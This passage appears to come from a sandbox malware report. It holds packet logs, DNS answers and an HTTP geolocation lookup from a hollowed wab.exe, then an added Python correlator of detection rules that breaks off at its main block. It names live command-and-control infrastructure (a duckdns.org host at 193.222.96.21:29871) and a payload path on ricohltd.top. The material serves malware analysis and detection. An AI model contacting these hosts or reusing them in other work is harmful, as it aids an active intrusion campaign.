Apr 26, 2024 07:44:27.038829088 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.039069891 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039134979 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039180994 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.039196014 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039211035 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039225101 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039237976 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039256096 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.039263964 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039282084 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.039310932 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039355993 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.039541960 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039642096 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039654970 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039689064 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.039710045 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039722919 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039756060 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.039782047 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039796114 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039841890 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.039860964 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039875031 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039907932 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.039935112 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039948940 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.039982080 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.040000916 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.040014029 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.040045023 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.040065050 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.040077925 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.040124893 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.040155888 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.040169001 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.040193081 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.040199995 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.040206909 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.040235043 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.040261984 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.040286064 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
Apr 26, 2024 07:44:27.040304899 CEST | 49709 | 29871 | 192.168.2.6 | 193.222.96.21
Apr 26, 2024 07:44:27.040318966 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.6
                                                      Apr 26, 2024 07:44:27.040361881 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.040363073 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040375948 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040389061 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040404081 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040417910 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040419102 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.040443897 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.040510893 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040551901 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040553093 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.040566921 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040579081 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040623903 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.040649891 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040663004 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040685892 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040693045 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.040699959 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040723085 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040731907 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.040761948 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.040771961 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040839911 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040853024 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040864944 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040883064 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.040911913 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.040915012 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040940046 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.040981054 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.041275978 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041289091 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041321993 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041332960 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.041333914 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041348934 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041363001 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041380882 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.041409016 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.041436911 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041450024 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041490078 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041503906 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041516066 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041524887 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.041529894 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041544914 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.041574955 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041587114 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.041590929 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041625023 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041636944 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.041639090 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041686058 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.041697979 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041712999 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041753054 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.041759014 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041785955 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041829109 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.041870117 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041882992 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041918993 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041922092 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.041938066 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.041980028 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.042761087 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.042840958 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.042854071 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.042885065 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.042927027 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.042952061 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.042970896 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043013096 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043026924 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043056965 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043097973 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043112040 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043126106 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043138981 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043142080 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043185949 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043185949 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043199062 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043210030 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043222904 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043234110 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043246031 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043296099 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043320894 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043339014 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043370008 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043384075 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043396950 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043409109 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043432951 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043453932 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043482065 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043497086 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043525934 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043528080 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043571949 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043595076 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043608904 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043620110 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043643951 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043649912 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043658972 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043673038 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043685913 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043715000 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043715954 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043802023 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043813944 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043826103 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043838978 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043845892 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043852091 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043879032 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.043890953 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043890953 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.043994904 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.044007063 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.044019938 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.044034004 CEST2987149709193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:27.044038057 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.044066906 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:27.140723944 CEST4970929871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:34.338869095 CEST2987149708193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:44:34.341164112 CEST4970829871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:44:34.622817993 CEST2987149708193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:45:05.301465988 CEST2987149708193.222.96.21192.168.2.6
                                                      Apr 26, 2024 07:45:05.361509085 CEST4970829871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:45:06.411159992 CEST4970829871192.168.2.6193.222.96.21
                                                      Apr 26, 2024 07:45:06.702857018 CEST2987149708193.222.96.21192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 26, 2024 07:44:20.590603113 CEST | 49850 | 53 | 192.168.2.6 | 1.1.1.1
Apr 26, 2024 07:44:21.025942087 CEST | 53 | 49850 | 1.1.1.1 | 192.168.2.6
Apr 26, 2024 07:44:23.007698059 CEST | 59843 | 53 | 192.168.2.6 | 1.1.1.1
Apr 26, 2024 07:44:24.221307039 CEST | 59843 | 53 | 192.168.2.6 | 1.1.1.1
Apr 26, 2024 07:44:24.275594950 CEST | 53 | 59843 | 1.1.1.1 | 192.168.2.6
Apr 26, 2024 07:44:24.346457005 CEST | 53 | 59843 | 1.1.1.1 | 192.168.2.6
Apr 26, 2024 07:44:25.135272026 CEST | 60275 | 53 | 192.168.2.6 | 1.1.1.1
Apr 26, 2024 07:44:25.261629105 CEST | 53 | 60275 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 26, 2024 07:44:20.590603113 CEST | 192.168.2.6 | 1.1.1.1 | 0x9622 | Standard query (0) | ricohltd.top | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:44:23.007698059 CEST | 192.168.2.6 | 1.1.1.1 | 0x8d98 | Standard query (0) | learfo55ozj01.duckdns.org | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:44:24.221307039 CEST | 192.168.2.6 | 1.1.1.1 | 0x8d98 | Standard query (0) | learfo55ozj01.duckdns.org | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:44:25.135272026 CEST | 192.168.2.6 | 1.1.1.1 | 0xaa48 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 26, 2024 07:44:21.025942087 CEST | 1.1.1.1 | 192.168.2.6 | 0x9622 | No error (0) | ricohltd.top | - | 172.67.191.112 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:44:21.025942087 CEST | 1.1.1.1 | 192.168.2.6 | 0x9622 | No error (0) | ricohltd.top | - | 104.21.60.38 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:44:24.275594950 CEST | 1.1.1.1 | 192.168.2.6 | 0x8d98 | No error (0) | learfo55ozj01.duckdns.org | - | 193.222.96.21 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:44:24.346457005 CEST | 1.1.1.1 | 192.168.2.6 | 0x8d98 | No error (0) | learfo55ozj01.duckdns.org | - | 193.222.96.21 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:44:25.261629105 CEST | 1.1.1.1 | 192.168.2.6 | 0xaa48 | No error (0) | geoplugin.net | - | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                      • ricohltd.top
                                                      • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49710 | 178.237.33.50 | 80 | 2644 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:44:25.500421047 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Apr 26, 2024 07:44:25.741831064 CEST | 1169 | IN | HTTP/1.1 200 OK
                                                      date: Fri, 26 Apr 2024 05:44:25 GMT
                                                      server: Apache
                                                      content-length: 961
                                                      content-type: application/json; charset=utf-8
                                                      cache-control: public, max-age=300
                                                      access-control-allow-origin: *
                                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 69 61 6d 69 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 46 4c 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 
22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 32 35 2e 37 36 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 38 30 2e 31 39 34 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                      Data Ascii: { "geoplugin_request":"102.129.152.220", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Miami", "geoplugin_region":"Florida", "geoplugin_regionCode":"FL", "geoplugin_regionName":"Florida", "geoplugin_areaCode":"", "geoplugin_dmaCode":"528", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"25.7689", "geoplugin_longitude":"-80.1946", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
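The DNS answers, the TCP sessions to 193.222.96.21:29871 and the geoplugin.net request above are the network-level observations a detection engineer would correlate: a dynamic-DNS name resolves to an IP that wab.exe then contacts on a non-standard port, and the same process performs a geolocation lookup. The following Python is an added example and is not part of the Joe Sandbox report or of the sample itself; its event records are constructed from the values in this report, and the dynamic-DNS suffix list, the common-port set and the rule names are illustrative assumptions, not a vendor rule set.

```python
"""Correlate DNS, connection and HTTP events into alerts.

Added example (not part of the Joe Sandbox report or of the sample): the event
records in report_events() are constructed from the values shown in the report;
the suffix list, the common-port set and the rule names are illustrative choices.
"""
from dataclasses import dataclass

# Assumption: providers whose subdomains are commonly rented for C2 (the C2 name
# in this report is a duckdns.org subdomain).
DYNDNS_SUFFIXES = ("duckdns.org", "no-ip.com", "ddns.net", "hopto.org")
# Assumption: outbound ports that need no further justification on their own.
COMMON_PORTS = {25, 53, 80, 123, 443, 587, 993, 995}
# Windows Mail address-book binaries; the sample runs inside a hollowed wab.exe,
# and the Sigma rule in the signatures list keys on exactly that.
NO_NETWORK_PROCESSES = {"wab.exe", "wabmig.exe"}
# Geolocation service queried right after the C2 name resolved (see the session above).
GEO_LOOKUP_HOSTS = {"geoplugin.net"}


@dataclass(frozen=True)
class Event:
    kind: str            # "dns" (answer), "conn" (TCP connect) or "http" (request)
    process: str = ""    # image name of the connecting process, lower-case
    name: str = ""       # dns: queried name; http: Host header
    answer: str = ""     # dns: A record returned
    dst_ip: str = ""     # conn: destination IP
    dst_port: int = 0    # conn: destination port
    src_port: int = 0    # conn: ephemeral client port
    path: str = ""       # http: request path


def dyndns_suffix(name):
    """Return the dynamic-DNS provider suffix of name, or None.

    Matches whole labels only, so 'notduckdns.org' is not flagged."""
    name = name.lower().rstrip(".")
    for suffix in DYNDNS_SUFFIXES:
        if name == suffix or name.endswith("." + suffix):
            return suffix
    return None


def correlate(events):
    """Walk events in time order; return a de-duplicated list of (rule, detail)."""
    resolved = {}   # IP -> most recent name that resolved to it
    alerts = []
    seen = set()

    def alert(rule, detail):
        # Two connections to the same C2 from different client ports yield one alert.
        if (rule, detail) not in seen:
            seen.add((rule, detail))
            alerts.append((rule, detail))

    for ev in events:
        if ev.kind == "dns" and ev.answer:
            resolved[ev.answer] = ev.name.lower().rstrip(".")
            suffix = dyndns_suffix(ev.name)
            if suffix:
                alert("dyndns-resolution", f"{ev.name} -> {ev.answer} ({suffix})")
        elif ev.kind == "conn":
            target = f"{ev.dst_ip}:{ev.dst_port}"
            if ev.process in NO_NETWORK_PROCESSES:
                alert("unexpected-network-process", f"{ev.process} -> {target}")
            name = resolved.get(ev.dst_ip)
            if name and dyndns_suffix(name) and ev.dst_port not in COMMON_PORTS:
                alert("dyndns-nonstandard-port", f"{ev.process} -> {target} ({name})")
        elif ev.kind == "http":
            if ev.name.lower() in GEO_LOOKUP_HOSTS:
                alert("geolocation-check", f"{ev.process} GET {ev.name}{ev.path}")
    return alerts


def report_events():
    """Constructed from the DNS answers, sessions and HTTP requests in this report."""
    return [
        Event("dns", name="ricohltd.top", answer="172.67.191.112"),
        Event("conn", process="wab.exe", dst_ip="172.67.191.112", dst_port=443, src_port=49707),
        Event("http", process="wab.exe", name="ricohltd.top", path="/aCqwFQDQz144.bin"),
        Event("dns", name="learfo55ozj01.duckdns.org", answer="193.222.96.21"),
        Event("conn", process="wab.exe", dst_ip="193.222.96.21", dst_port=29871, src_port=49708),
        Event("conn", process="wab.exe", dst_ip="193.222.96.21", dst_port=29871, src_port=49709),
        Event("dns", name="geoplugin.net", answer="178.237.33.50"),
        Event("conn", process="wab.exe", dst_ip="178.237.33.50", dst_port=80, src_port=49710),
        Event("http", process="wab.exe", name="geoplugin.net", path="/json.gp"),
    ]


if __name__ == "__main__":
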